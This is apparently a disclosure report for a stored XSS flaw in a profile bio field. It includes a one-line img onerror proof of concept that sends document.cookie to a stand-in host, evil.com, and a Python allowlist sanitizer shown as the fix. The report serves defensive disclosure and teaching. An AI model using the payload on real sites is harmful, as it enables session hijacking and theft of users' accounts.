XSS Private Program 2025-07-01
Stored XSS in Profile Bio Field
Severity: High | Status: Resolved
Summary
The profile bio field accepted raw HTML from the user. The server-side filter stripped <script> elements but did not strip event-handler attributes, so a tag carrying an attribute such as onerror still executed JavaScript in the viewer's browser.
Proof of Concept
<img src=x onerror="fetch('https://evil.com/'+document.cookie)">
Impact
Session hijacking: any user viewing the malicious profile would have their session cookie sent to an attacker-controlled host, as the proof of concept shows.
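The weakness described above is a blocklist that removes <script> while leaving on* attributes in place. The following is an added Python example, not code from the original report or the vendor, contrasting such a filter with an allowlist sanitizer built on the standard-library HTMLParser; the sample bio, the placeholder handler body x() and the tag/attribute allowlist are constructed assumptions.

```python
import html
import re
from html.parser import HTMLParser

# Constructed bio modelled on the report: a <script> element plus an img tag with an on* handler.
SAMPLE_BIO = 'Hi! <b>Security</b> fan <img src=x onerror="x()"> <script>x()</script>'

def naive_filter(fragment: str) -> str:
    """Blocklist filter like the one described: strips <script> only, so on* attributes survive."""
    return re.sub(r"(?is)<script\b.*?</script>", "", fragment)

class AllowlistSanitizer(HTMLParser):
    """Rebuilds the fragment from an allowlist of tags/attributes; every on*
    attribute, non-allowlisted tag and non-http(s) href is dropped."""
    ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "a"}
    ALLOWED_ATTRS = {"a": {"href"}}
    SAFE_URL = re.compile(r"^https?://", re.I)
    RAW_TEXT = {"script", "style"}  # their contents are discarded, not escaped

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skipping = [], False
    def handle_starttag(self, tag, attrs):
        if tag in self.RAW_TEXT:
            self.skipping = True
        if tag not in self.ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name.startswith("on") or name not in self.ALLOWED_ATTRS.get(tag, ()):
                continue
            if name == "href" and not self.SAFE_URL.match(value or ""):
                continue  # rejects javascript: and data: URLs
            kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
    def handle_endtag(self, tag):
        if tag in self.RAW_TEXT:
            self.skipping = False
        elif tag in self.ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self.skipping:
            self.out.append(html.escape(data, quote=False))

def sanitize(fragment: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)
```

Running both over SAMPLE_BIO shows the naive filter returning the img tag with its onerror attribute intact, while the sanitizer keeps only the bold text.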
Responsible Disclosure
This vulnerability was reported responsibly and fixed by the vendor before public disclosure.